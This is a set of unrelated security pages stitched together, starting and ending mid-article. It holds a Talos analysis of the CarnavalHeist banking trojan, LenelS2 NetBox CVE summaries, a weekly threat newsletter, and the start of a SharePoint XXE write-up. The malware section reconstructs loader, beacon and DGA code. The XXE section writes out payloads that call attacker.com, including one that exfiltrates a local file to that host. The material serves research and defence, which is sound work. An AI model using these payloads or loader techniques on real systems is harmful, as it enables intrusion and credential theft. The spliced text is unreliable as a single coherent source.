Company owned by the threat actor associated with CarnavalHeist.

Another domain used to host the initial payload is also registered in Brazil and again exposes information about the owner. 

Whois information for a second threat actor associated with CarnavalHeist.

For this person, it was easier to find more information based on their CPF, as they have criminal records, according to the Brazilian judiciary service:

Criminal records for threat actor associated with CarnavalHeist.

Based on this information, Talos assesses with high confidence that these two actors are behind the development and operation of the campaign distributing CarnavalHeist and affecting Brazilian victims.

Analysis of batch file “a3.cmd” and Python loader 

The file “a3.cmd” is a Windows batch file with several layers of simple encoding and obfuscation that serves as a wrapper for installing Python on the target environment and subsequently executing a Python script that injects the second-stage payload DLL.

Batch file used in the first stage of infection.

This first layer decodes to another script, which downloads a Python interpreter from the official Python FTP server and installs it into a malware-created folder.

PowerShell script downloading and installing Python and subsequently running the malicious loader.

Using the downloaded Python interpreter, the batch file then executes an embedded base64-encoded Python script. Decoding the base64 string embedded in the Python command reveals the final component of the cascading commands: a loader that injects a malicious DLL.

Python script used to download and inject the malicious banking DLL.
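The cascading pattern boils down to a decode-and-exec one-liner. Here is a harmless sketch of the same shape (the payload below is a stand-in, not the malware's script):

import base64

# The batch file's trick, reduced to its essence: decode an embedded
# base64 blob and hand it to exec(). A benign payload stands in here.
embedded = base64.b64encode(b"print('loader stage would run here')").decode()
exec(base64.b64decode(embedded))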

The script checks the processor architecture from the registry key `HARDWARE\DESCRIPTION\System\CentralProcessor\0` and bails out if the processor name value is “Broadwell.” It then uses the function `lk()` as a domain generation algorithm (DGA) to generate a fully qualified domain name (FQDN) under the BrazilSouth region in Azure, from which the malicious DLL will be downloaded. We explain how this domain is generated in a section below.

Once the correct FQDN has been generated, a TCP connection is opened. The script sends a UTF-8-encoded packet to the actor’s Azure server in the format below, where the victim’s hostname, Windows version name and processor architecture name are all passed as identifying markers: 

`pyCodeV1 - *NEW* {ss.gethostname()} | {Windows Product Name} | {Processor Architecture Name}` 

The server then sends back a byte stream containing a DLL payload named “executor.dll”, a second-stage Python script that will load the DLL, and additional Python modules used to load it. This data object is then deserialized within the parent Python script and executed as the next stage through Python’s `exec()` command.
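Reduced to code, the check-in described above might look like the following sketch. It only builds and prints the identifying beacon; the real script reads the Windows product name from the registry (platform.* stands in here), and the connection, response handling, and exec() stage are omitted:

import platform
import socket

# Build the identification beacon in the format observed in the sample.
# platform.win32_ver()/platform.machine() are stand-ins for the sample's
# registry lookups of the Windows product name and processor architecture.
beacon = (f"pyCodeV1 - *NEW* {socket.gethostname()} | "
          f"{platform.win32_ver()[0]} | {platform.machine()}")
print(beacon.encode("utf-8"))  # sent over the raw TCP connection to the C2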

Using CodePy for dynamic DLL execution 

The byte stream contains a handful of components that are passed to the `exec()` command to set up the downstream execution logic. On execution, CodePy first saves a copy of the previous Python script to the user’s public directory as “ps.txt”.

Next, the script unpacks the “executor.dll” PE file and loads the resulting bytes buffer of the DLL dynamically into memory through pythonmemorymodule’s `MemoryModule` class. Finally, the function entry point `Force` is called from `executor.dll` through the MemoryModule class function `get_proc_addr`. On execution, `Force` generates an up to 19-character randomized string using a similar character key string, as seen in the DGA function in the Python script.  

It then selects a random directory among the typical standard Windows folders in the system’s default user profile. The injector then checks whether the system is running a 32- or 64-bit operating system and copies “mshta.exe” from the proper 32-bit folder to the selected user folder, renamed with a random character string and an .exe extension.

Finally, the embedded payload, a UPX-packed banking trojan, is then extracted from a resource within executor.dll marked as “RcDLL”. It is another Delphi-based DLL, named "Access_PC_Client.dll" in many of the observed samples. The payload bytes are then written to a memory stream and injected into a spawned “mshta.exe” process.  

Resource present in the malicious loader DLL.

Final payload: Banking trojan DLL 

CarnavalHeist will attempt to steal the victim’s credentials for a variety of Brazilian financial institutions. This is accomplished through overlay attack methodologies, whereby an actor presents an overlaid window on top of the expected legitimate application or service.  

Like other Brazilian banking trojans, the malware monitors window title strings for specific word and pattern matches. When a window title matches, the malware sets the window to invisible and replaces it with a bundled overlay image for the given organization. At the same time, a timer will attempt to open a new socket connection to an actor-controlled C2, using another DGA function to generate a separate C2 domain. This DGA is distinct from the one used by the Python loader script, although it also uses a server hosted in the BrazilSouth resource region on Azure.

CarnavalHeist possesses numerous capture capabilities commonly associated with banking trojans, which are either executed automatically once a matching bank is detected or triggered by a command from the C2.

The protocol is a customized version of publicly available code for a Delphi remote access client, and it is the same protocol used in the past by other banker families like Mekotio and Casbaneiro. Luckily, these commands are not obfuscated and are exposed in the binary code. A single function processes all input from the C2, translating into a series of IF/THEN structures, one for each command:

Sequence of commands being processed from C2 communication.

The code supports approximately 80 commands from the C2, including keyboard capture, screenshots, video capture and remote control. They also enable the attacker to trigger specific overlay attacks to steal the login information for the banking institutions while the user interacts with the fake login screens.  

Commands sent from the C2 and responses from the malware are all sent unencrypted through a TCP connection on a random port. The commands and responses are usually enclosed in the tags shown in the code. One example of this is how the malware answers when the C2 responds to the initial connection attempt: 

`<|Info|>BANK_NAME<|>Windows 10 Enterprise<|>DESKTOP-XXXXXXX<|>Intel(R) Xeon(R) W-2295 CPU @ 3.00GHz<|><<|` 
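
As an illustration of that framing, a minimal parser could look like the sketch below; the tag layout follows the sample above, while the function and the field meanings are our inference.

```python
def parse_c2_message(raw: str):
    """Split a tag-delimited CarnavalHeist C2 frame into command and fields."""
    tag_end = raw.index("|>", 2)               # end of the leading <|Command|> tag
    command = raw[2:tag_end]                   # e.g. "Info"
    body = raw[tag_end + 2:]                   # everything after the command tag
    fields = body.rstrip("<|>").split("<|>")   # drop the <|><<| trailer, split fields
    return command, fields

cmd, fields = parse_c2_message(
    "<|Info|>BANK_NAME<|>Windows 10 Enterprise<|>DESKTOP-XXXXXXX"
    "<|>Intel(R) Xeon(R) W-2295 CPU @ 3.00GHz<|><<|"
)
# cmd == "Info"; fields == [bank, OS version, hostname, CPU]
```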

There are also functions present in the binary that deal with remote control capabilities using the AnyDesk remote desktop software, which allows the attacker to interact with the user’s machine during a banking session. Some of the commands accept additional parameters, like an IP and port to be used for the video connection or for keyboard/clipboard interaction in the case of remote access. 

CarnavalHeist can also capture and create QR codes on demand, which many banks use to allow users to log in and execute transactions. This enables the attacker to redirect transactions to accounts they control instead of the accounts the user intended. 

Code showing the creation of QR code to overlay on victim's banking session.

Capturing mouse and keyboard events and their key translations would expose PINs and other similar tokens for these banks, while potentially “passing through” the sign-in to the legitimate service underneath the overlay, much like a skimmer on a credit card reader or ATM keypad. 

Keyboard overlay used to capture banking PIN.

CarnavalHeist C2 protocol and DGA analysis 

CarnavalHeist uses different algorithms to generate the subdomains it uses to download payloads and communicate with its C2 servers. These subdomains are all hosted under the BrazilSouth availability zone in Azure at “{dga}[.]brazilsouth[.]cloudapp[.]azure[.]com”.  

The DGA that generates the correct subdomains is contained within a function named `lk()` in the Python script.  

Functions implementing the DGA were used to download the banking trojan payload.

It first gets the current date and weekday values from the Python datetime module and adds them together to generate an integer value. This value is used as an index to retrieve a character from the hardcoded string `{abcdefghijlmnopqrstuvxzwkyjlmnopqabcghjl}`.  

Five possible subdomain string choices are then generated and hashed with the SHA1 algorithm, followed by further string manipulation before each value is returned. A random entry from this list is then selected to generate the final FQDN. 

Then, a random TCP port is generated by the function `ptV5()`, which follows a similar algorithm using the dates as a seed, and these parameters are passed to Python’s `connect()` function.  
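
Putting the pieces above together, the loader-side DGA has roughly the following shape. The function names (`lk()`, `ptV5()`), the character key string, the SHA1 step, the five-candidate list and the Azure suffix come from the analysis; the exact arithmetic and string manipulation are simplified stand-ins.

```python
import hashlib
import random
from datetime import datetime

KEY = "abcdefghijlmnopqrstuvxzwkyjlmnopqabcghjl"   # hardcoded character key

def lk() -> str:
    now = datetime.now()
    idx = (now.day + now.weekday()) % len(KEY)      # date-derived index into KEY
    candidates = []
    for i in range(5):                              # five possible subdomains
        seed = f"{KEY[idx]}{now.month}{now.year}{i}"
        digest = hashlib.sha1(seed.encode()).hexdigest()
        candidates.append(digest[:16])              # further string manipulation
    sub = random.choice(candidates)                 # random entry from the list
    return f"{sub}.brazilsouth.cloudapp.azure.com"

def ptV5() -> int:
    now = datetime.now()
    return 1024 + (now.day * now.month * 7) % 40000  # date-seeded port (illustrative)
```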

The algorithm used by the malicious DLL to generate the subdomain used for C2 communication is also based on the current date and time, but it adds additional seeds depending on which bank is currently being accessed by the victim, whether through a web browser or one of the custom banking desktop applications used by some banks in Brazil. These seed values are single hex bytes associated with each bank: 

  • Target bank 1: 0x55 
  • Secondary targeted banks: 0x56 
  • All other financial institutions: 0x57 

The DGA will then select a starting letter for the subdomain based on an array of non-ordered alpha characters like in the Python script. It then uses the integer representations of the current day of the week, month and year, as well as the current month and week of the year, to generate separate additional parts of the subdomain string through several arithmetic operations.  
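
For illustration, the DLL-side DGA can be pictured with this minimal sketch; the seed bytes are the values listed above, while the character array and the arithmetic are stand-ins for the Delphi binary’s actual logic.

```python
from datetime import datetime

ALPHA = "abcdefghijlmnopqrstuvxzw"   # stand-in for the non-ordered alpha array

def dll_dga(bank_seed: int) -> str:  # bank_seed: 0x55, 0x56 or 0x57
    now = datetime.now()
    week = now.isocalendar()[1]      # week of the year
    parts = [
        ALPHA[(now.weekday() + bank_seed) % len(ALPHA)],  # starting letter
        str((now.month * bank_seed) % 97),                # date-derived chunks
        str((now.year + week) % 997),
    ]
    return "".join(parts) + ".brazilsouth.cloudapp.azure.com"
```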

CarnavalHeist has likely been in active development since at least November of 2023, while significant in-the-wild activity first began in February 2024. Based on the information we had about the DGA domains and activities performed by the Python script, Talos discovered samples in VirusTotal and Talos telemetry dating back to November 2023. 

Tracing the DGA domains from the Python script and the final payload in our DNS telemetry, we first observed in-the-wild activity on Feb. 20, 2024, with more consistent activity ramping up in the weeks that followed. Additional variants of the Python loader containing slight alterations to the DGA were observed later in our investigation. Tracing all the potential domains from all the DGA variations, we observe initial visible activity beginning in February, with larger spikes in actor domain activity starting in late March and continuing to the present. 

DNS activity for the DGA domains used by CarnavalHeist.

We assess that the actor(s) behind CarnavalHeist are of low to moderate sophistication. Some aspects of the code and malware hint at sophistication, whether borrowed or their own, but are then short-circuited or rendered pointless by mistakes or odd choices elsewhere. For example, the DGA for some of the Python cradles goes through the trouble of generating a list of five different potential subdomains to be used on any given day. The list of subdomains is then referenced by Python’s random choice function, but the list is sliced in a way that only the last option is ever used. This is corrected to use all five choices in another version of the Python script we observed. The actor is worth monitoring, as the ability to incorporate complexity within their malware is more concerning than the initially observed missteps, which can always be corrected in future development iterations. The number of additional variants we observed also suggests that the author of CarnavalHeist is actively developing it. 

Talos is continuing to monitor developments and analyze additional related samples and infrastructure to this actor and campaign. 

MITRE ATT&CK 

  • Initial Access – T1566.001: Phishing: Spearphishing Attachment 
  • Execution – T1059.001: Command and Scripting Interpreter: PowerShell 
  • Execution – T1059.003: Command and Scripting Interpreter: Windows Command Shell 
  • Execution – T1059.006: Command and Scripting Interpreter: Python 
  • Persistence – T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 
  • Privilege Escalation – T1055.001: Process Injection: Dynamic-link Library Injection 
  • Defense Evasion – T1027.010: Obfuscated Files or Information: Command Obfuscation 
  • Defense Evasion – T1027.012: Obfuscated Files or Information: LNK Icon Smuggling 
  • Defense Evasion – T1027.009: Obfuscated Files or Information: Embedded Payloads 
  • Defense Evasion – T1036.008: Masquerading: Masquerade File Type 
  • Credential Access – T1056.001: Input Capture: Keylogging 
  • Credential Access – T1056.002: Input Capture: GUI Input Capture 
  • Discovery – T1010: Application Window Discovery 
  • Discovery – T1082: System Information Discovery 
  • Lateral Movement – T1570: Lateral Tool Transfer 
  • Collection – T1113: Screen Capture 
  • Collection – T1125: Video Capture 
  • Command and Control – T1102: Web Service 
  • Command and Control – T1102.002: Web Service: Bidirectional Communication 
  • Command and Control – T1104: Multi-Stage Channels 
  • Command and Control – T1105: Ingress Tool Transfer 
  • Command and Control – T1568.002: Dynamic Resolution: Domain Generation Algorithms 
  • Command and Control – T1571: Non-Standard Port 
  • Exfiltration – T1020: Automated Exfiltration 
  • Exfiltration – T1041: Exfiltration Over C2 Channel 
  • Exfiltration – T1567: Exfiltration Over Web Service 

Coverage 

Ways our customers can detect and block this threat are listed below. 


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here. 

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context for your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The following Snort SIDs are applicable to this threat: 63515, 63516, 63517, 63518 and 300922. 

The following ClamAV detections are also available for this threat: 

Win.Trojan.CarnavalHeist-10029766-0 
Lnk.Downloader.CarnavalHeist-10029991-0 
Win.Dropper.CarnavalHeist-10029449-0 
Win.Loader.CarnavalHeist-10029772-0 

Indicators of Compromise 

Indicators of Compromise associated with this threat can be found here. 

CVE-2024-2422

CWE-88: IMPROPER NEUTRALIZATION OF ARGUMENT DELIMITERS IN A COMMAND ('ARGUMENT INJECTION')
LenelS2 NetBox access control and event monitoring system was discovered to contain an authenticated remote code execution vulnerability in versions prior to and including 5.6.1, which allows an attacker to execute malicious commands.

CVE-2024-2421

CWE-78: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND ('OS COMMAND INJECTION')

LenelS2 NetBox access control and event monitoring system was discovered to contain an unauthenticated remote code execution vulnerability in versions prior to and including 5.6.1, which allows an attacker to execute malicious commands with elevated permissions.

CVE-2024-2420

CWE-259: USE OF HARD-CODED PASSWORD
LenelS2 NetBox access control and event monitoring system was discovered to contain hard-coded credentials in versions prior to and including 5.6.1, which allow an attacker to bypass authentication requirements.

Attackers are impersonating a road toll payment processor across the U.S. in phishing attacks


My wife (no stranger to weird types of scams) recently received a fake text message from someone claiming to be New Jersey’s E-ZPass program saying that she had an outstanding balance from highway tolls that she owed, prompting her to visit a site so she could pay and avoid additional fines. 

There was plenty of reason to believe this was a legitimate ask. Her family is from New Jersey, so we make frequent trips there, paying $20-plus in tolls along the way. We had also just completed a trip from there a few weeks prior (though I’m not sure whether the timing of the spam text was a coincidence), and we both have E-ZPass accounts. 

For the uninitiated, or anyone who lives in a country where taxes are paid as normal and therefore cover appropriate road repairs, E-ZPass is a small device that drivers in more than a dozen U.S. states can register for so they can automatically pay tolls along highways, rather than having to stop and use cash or coins or spend a few extra minutes manually processing a transaction.  

Each state or city has its own agencies that deal with E-ZPass, each with its own payment processing system and website. In New Jersey’s case, the phishing site the scammers set up was shockingly convincing and looked remarkably similar to the legitimate New Jersey E-ZPass website.  

The phishing website set up by scammers (left) meant to look like the legitimate New Jersey E-ZPass website (right).

Once we logged into our legitimate E-ZPass account to confirm we had, in fact, paid all the appropriate tolls, I alerted my team about this scam, and we blocked the phishing URL in question in Cisco Secure products.  

Since this victory and foray into threat hunting, I have learned that this is a problem everywhere, not just for New Jersey drivers. 

Since this experience, E-ZPass has sent out an alert in all the states where it operates warning about these types of scams. Drivers from New York to Georgia and Pennsylvania have received equally convincing phishing text messages and lure pages.  

It’s unclear what the adversaries’ goals are in this case, but it’s probably safe to assume they’re looking to collect users’ credit card information when victims go to pay the alleged overdue toll. They could also be harvesting E-ZPass login information to gather further data about the drivers. 

In April, the FBI also warned of SMS phishing scams in which adversaries pretended to be toll collection services from three different U.S. states. SunPass, Florida’s equivalent of E-ZPass, also alerted users to similar scams around the same time the E-ZPass scams started being reported. And in March, the FasTrak service in California warned of the same problems.  

My hunch is that these types of services are being impersonated all over the U.S. for several reasons: Thousands of drivers use them (especially in states with large commuter populations), which makes it likely that whoever receives the text will be familiar with these devices and will have recently driven on a toll highway. The amounts requested are also small, no more than $5, so they don’t set off immediate alarm bells, unlike similar scams that ask for hundreds of dollars for health care services. And because the requests come through as SMS messages, targets are more likely to open them on their mobile devices, which may not have the same security in place as a laptop or managed company device. 

No individual state or local agency is immune from this style of scam, so if you’re ever in doubt about a text like this, it’s best to call the government program in question and ask about any suspicious activity before clicking on any links or submitting payment information. 

The one big thing 

Cisco Talos’ Vulnerability Research team has helped to disclose and patch more than 20 vulnerabilities over the past three weeks, including two in the popular Adobe Acrobat Reader software. Acrobat, one of the most popular PDF readers currently available, contains two out-of-bounds read vulnerabilities that could lead to the exposure of sensitive contents of arbitrary memory in the application. There are also eight vulnerabilities in a popular line of PLC CPU modules commonly used in automated environments. We have more detailed information in our full Vulnerability Roundup from this week. 

Why do I care? 

Several vulnerabilities were identified in the AutomationDirect P3 line of CPU modules. The P3-550E is the most recent CPU module released in the Productivity3000 line of Programmable Automation Controllers from AutomationDirect. The device communicates remotely via Ethernet, serial and USB, and exposes a variety of control services, including MQTT, Modbus, ENIP and the engineering workstation protocol DirectNET. Four of the vulnerabilities found in these PLC CPU modules received a CVSS security score of 9.8 out of 10, making them particularly notable. TALOS-2024-1942 (CVE-2024-21785) is a leftover debug code vulnerability that allows an adversary who can communicate with the device over ModbusRTU to enable the device’s diagnostic interface without any other knowledge of the target device. There is also TALOS-2024-1943 (CVE-2024-23601), which can lead to remote code execution if the attacker sends a specially crafted file to the targeted device, and TALOS-2024-1939 (CVE-2024-24963 and CVE-2024-24962), covering stack-based buffer overflows that can also lead to remote code execution if the attacker sends a specially formatted packet to the device. 

So now what? 

Each of the vendors mentioned in this week’s Vulnerability Roundup has released patches for affected products, and users should download these patches as soon as possible. For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website. 

Top security headlines of the week 

Security researchers are warning about the dangers of a new AI “Recall” feature for Microsoft Windows 11. Microsoft recently announced a new update that will allow a computer to remember past actions taken by the user and then use a simple search to query that information (e.g., “Where did I store that document again?”). However, because Recall essentially takes individual snapshots of a machine and stores them locally, there are several security concerns. If an adversary were to infect a targeted machine with information-stealing malware, they could steal important databases stored locally, including anything stored by Windows Recall. Recall also contains what are essentially keylogging functions, leaving the door open for adversaries to easily steal login credentials or other personal information entered into the machine over the previous three months. The United Kingdom’s data protection agency has already contacted Microsoft inquiring about the way this information is stored and used, and it has asked for assurance that users’ data will be properly safeguarded and not used by the company. Other unauthorized users may also be able to access and query Recall’s information should they obtain physical access to the device. (Bleeping Computer, Double Pulsar) 

Popular spyware app pcTattletale had to completely shut down after a data breach and the seizure of its website. The company that operates the app, which quietly and remotely tracks users’ activities on infected machines and takes screenshots, had its website defaced earlier this week by a hacker, along with a dump of data belonging to alleged pcTattletale customers and victims. Just days before the disruption, reports surfaced that the software was quietly installed on computers that handled the check-in process at at least three Wyndham hotels across the U.S. A vulnerability in the platform could have allowed anyone on the internet who exploited it to download screenshots captured by the software directly from its servers. pcTattletale advertised itself as software that could allow anyone to control it remotely and view the target’s Android or Windows devices and their data from anywhere in the world. The founder of the spyware said that, after the data breach, the company was “out of business and completely done.” The now-defunct app had 138,000 registered customers, according to data breach notification website Have I Been Pwned. (TechCrunch, TechCrunch (again)) 

Ascension hospitals across the U.S. are still having to delay patient care more than three weeks after a cyber attack. As of earlier this week, the national hospital system was still experiencing network disruptions, forcing staff to write care notes by hand and deliver orders for tests and prescriptions in person. Patients have also been unable to use their online portals to contact their doctors or view their medical records. Ascension is one of the largest health systems in the U.S., with more than 140 hospitals across the country. It first alerted patients and doctors about “unusual activity” on May 8, and there is no timeline for when services will be fully restored. News reports indicate that the disruption is a ransomware attack attributed to the BlackBasta threat actor, which has links to Russia. Large health care organizations have increasingly become the target of ransomware attacks, with a previous campaign targeting Change Healthcare earlier this year disrupting payments to medical providers across the U.S. for weeks. (NPR, The New York Times) 

Can’t get enough Talos? 

Upcoming events where you can find Talos 

Cisco Live (June 2 - 6) 

Las Vegas, Nevada 

Bill Largent from Talos' Strategic Communications team will be giving our annual "State of Cybersecurity" talk at Cisco Live on Tuesday, June 4 at 11 a.m. Pacific time. Jaeson Schultz from Talos Outreach will have a talk of his own on Thursday, June 6 at 8:30 a.m. Pacific, and there will be several Talos IR-specific lightning talks at the Cisco Secure booth throughout the conference.

AREA41 (June 6 – 7) 

Zurich, Switzerland 

Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the paramount importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches. 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202 
MD5: e4acf0e303e9f1371f029e013f902262 
Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe 
Claimed Product: FileZilla 
Detection Name: W32.Application.27hg.1201 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0 
MD5: b4440eea7367c3fb04a89225df4022a6 
Typical Filename: Pdfixers.exe 
Claimed Product: Pdfixers 
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201 

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A   
Detection Name: PUA.Win.Dropper.Generic::1201 

SHA 256: e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c     
MD5: a087b2e6ec57b08c0d0750c60f96a74c     
Typical Filename: AAct.exe     
Claimed Product: N/A       
Detection Name: PUA.Win.Tool.Kmsauto::1201 

CVE-2024-30043: Abusing URL Parsing Confusion to Exploit XXE on SharePoint Server and Cloud

Yes, the title is right. This blog covers an XML eXternal Entity (XXE) injection vulnerability that I found in SharePoint. The bug was recently patched by Microsoft. In general, XXE vulnerabilities are not very exciting in terms of discovery and related technical aspects. They may sometimes be fun to exploit and exfiltrate data (or do other nasty things) in real environments, but in the vulnerability research world, you typically find them, report them, and forget about them.

So why am I writing a blog post about an XXE? I have two reasons:

  • It affects SharePoint, both on-prem and cloud instances, which is a nice target. This vulnerability can be exploited by a low-privileged user.
  • This is one of the craziest XXEs that I have ever seen (and found), both in terms of vulnerability discovery and the method of triggering. When we talk about overall exploitation and impact, this Pwn2Own win by Chris Anastasio and Steven Seeley is still my favorite.

The vulnerability is known as CVE-2024-30043, and, as one would expect with an XXE, it allows you to:

  • Read files with SharePoint Farm Service account permissions.
  • Perform server-side request forgery (SSRF) attacks.
  • Perform NTLM relaying.
  • Achieve any other side effects to which XXE may lead.

Let us go straight to the details.

BaseXmlDataSource DataSource

Microsoft.SharePoint.WebControls.BaseXmlDataSource is an abstract base class, inheriting from DataSource, for data source objects that can be added to a SharePoint Page. DataSource can be included in a SharePoint page, in order to retrieve data (in a way specific to a particular DataSource). When a BaseXmlDataSource is present on a page, its Execute method will be called at some point during page rendering:

At [1], you can see the Execute method, which accepts a string called request. We fully control this string, and it should be a URL (or a path) pointing to an XML file. Later, I will refer to this string as DataFile.

At this point, we can divide this method into two main parts: XML fetching and XML parsing.

       a) XML Fetching

At [2], this.FetchData is called and our URL is passed as an input argument. BaseXmlDataSource does not implement this method (it’s an abstract class).

FetchData is implemented in three classes that extend our abstract class:
  • SoapDataSource – performs an HTTP SOAP request and retrieves a response (XML).
  • XmlUrlDataSource – performs a customizable HTTP request and retrieves a response (XML).
  • SPXmlDataSource – retrieves an existing specified file from the SharePoint site.

We will revisit those classes later.

       b) XML Parsing

At [3], the xmlReaderSettings.DtdProcessing member is set to DtdProcessing.Prohibit, which should disable the processing of DTDs.

At [4] and [5], the xmlTextReader.XmlResolver is set to a freshly created XmlSecureResolver. The request string, which we fully control, is passed as the securityUrl parameter when creating the XmlSecureResolver.

At [6], the code creates a new instance of XmlReader.

Finally, it reads the contents of the XML using a while-do loop at [7].

At first glance, this parsing routine seems correct. The document type definition (DTD) processing of our XmlReaderSettings instance is set to Prohibit, which should block all DTD processing. On the other hand, we have the XmlResolver set to XmlSecureResolver.

In my experience, it is very rare to see .NET code where:
• DTDs are blocked through XmlReaderSettings.
• Some XmlResolver is still defined.

I decided to play around and sent a general entity-based payload at some test code I wrote, similar to the code shown above (I only replaced XmlSecureResolver with XmlUrlResolver for testing purposes):
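
The payload appears as an image in the original post; a general entity-based payload of the kind described takes this shape (an illustrative reconstruction, not the author’s exact file):

```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://attacker.com/oob">
]>
<root>&xxe;</root>
```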

As expected, no HTTP request was performed, and a DTD processing exception was thrown. What about this payload?
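
Reconstructing again from the description, the second payload swaps the general entity for a parameter entity that is resolved inside the DTD itself (illustrative):

```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % xxe SYSTEM "http://attacker.com/oob">
  %xxe;
]>
<root/>
```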

It was a massive surprise to me, but the HTTP request was performed! According to that, it seems that when you have .NET code where:
• XmlReader is used with XmlTextReader and XmlReaderSettings.
• XmlReaderSettings.DtdProcessing is set to Prohibit.
• An XmlTextReader.XmlResolver is set.

the resolver will first try to handle the parameter entities, and only afterwards perform the DTD prohibition check! An exception will be thrown in the end, but it still allows you to exploit the out-of-band XXE and potentially exfiltrate data (using, for example, an HTTP channel). 
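
A classic out-of-band exfiltration chain of this kind hosts a DTD on the attacker’s server and smuggles file contents out through a URL, along these lines (a textbook example, not the author’s exact payload):

```xml
<!-- evil.dtd, hosted on the attacker's server -->
<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?d=%file;'>">
%eval;
%exfil;
```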

The XXE is there, but we have to solve two mysteries:

• How can we properly fetch the XML payload in SharePoint?
• What’s the deal with this XmlSecureResolver?

XML Fetching and XmlSecureResolver

As I have already mentioned, there are 3 classes that extend our vulnerable BaseXmlDataSource. Their FetchData method is used to retrieve the XML content based on our URL. Then, this XML will be parsed with the vulnerable XML parsing code.

Let’s summarize those 3 classes:

       a) XmlUrlDataSource

       • Accepts URLs with a protocol set to either http or https.
       • Performs an HTTP request to fetch the XML content. This request is customizable. For example, we can select which HTTP method we want to use.
       • Some SSRF protections are implemented. This class won’t allow you to make HTTP requests to local addresses such as 127.0.0.1 or 192.168.1.10. Still, you can use it freely to reach external IP address space.

       b) SoapDataSource

       • Almost identical to the first one, although it allows you to perform SOAP requests only (body must contain valid XML, plus additional restrictions).
       • The same SSRF protections exist as in XmlUrlDataSource.

       c) SPXmlDataSource

       • Allows retrieval of the contents of SharePoint pages or documents. If you have a file test.xml uploaded to the sample site, you can provide a URL as follows: /sites/sample/test.xml.

At this point, those HTTP-based classes look like a great match. We can:
• Create an HTTP server.
• Fetch malicious XML from our server.
• Trigger XXE and potentially read files from SharePoint server.

Let’s test this. I’m creating an XmlUrlDataSource, and I want it to fetch the XML from this URL:

       http://attacker.com/poc.xml

poc.xml contains the following payload:
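
The payload itself appears as an image in the original post; a parameter-entity probe of the shape described would look like this (illustrative):

```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % ssrf SYSTEM "http://localhost/test">
  %ssrf;
]>
<root/>
```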

The plan is simple. I want to test the XXE by executing an HTTP request to the localhost (SSRF).

We must also remember that whatever URL we specify as our source also becomes the securityUrl of the XmlSecureResolver. Accordingly, this is what will be executed:

Figure 1 XmlSecureResolver initialization

Who cares anyway? YOLO and let’s move along with the exploitation. Unfortunately, this is the exception that appears when we try to execute this attack:

Figure 2 Exception thrown during XXE->SSRF

It seems that the “Secure” in XmlSecureResolver stands for something. In general, it is a wrapper around various resolvers that allows you to apply resource-fetching restrictions. Here is a fragment of the Microsoft documentation:

“Helps to secure another implementation of XmlResolver by wrapping the XmlResolver object and restricting the resources that the underlying XmlResolver has access to.”

In general, it is based on Microsoft Code Access Security. Depending on the provided URL, it creates some resource access rules. Let’s see a simplified example for the http://attacker.com/test.xml:

Figure 3 Simplified sample restrictions applied by XmlSecureResolver

In short, it creates restrictions based on the protocol, hostname and a couple of other things (like an optional port, which is not applicable to all protocols). If we fetch our XML from http://attacker.com, we won’t be able to make a request to http://localhost because the host does not match.

The same goes for the protocol. If we fetch XML from the attacker’s HTTP server, we won’t be able to access local files with XXE, because neither the protocol (http:// versus file://) nor the host match as required.

To summarize, this XXE is useless so far. Even though we can technically trigger the XXE, it only allows us to reach our own server, which we can also achieve with the intended functionality of our SharePoint data sources (such as XmlUrlDataSource). We need to figure out something else.

SPXmlDataSource and URL Parsing Issues

At this point, I was not able to abuse the HTTP-based sources. I tried to use SPXmlDataSource with the following request:

       /sites/mysite/test.xml

The idea is simple. We are a SharePoint user, and we can upload files to some sites. We upload our malicious XML to the http://sharepoint/sites/mysite/test.xml document and then we:
       • Create SPXmlDataSource
       • Set DataFile to /sites/mysite/test.xml.

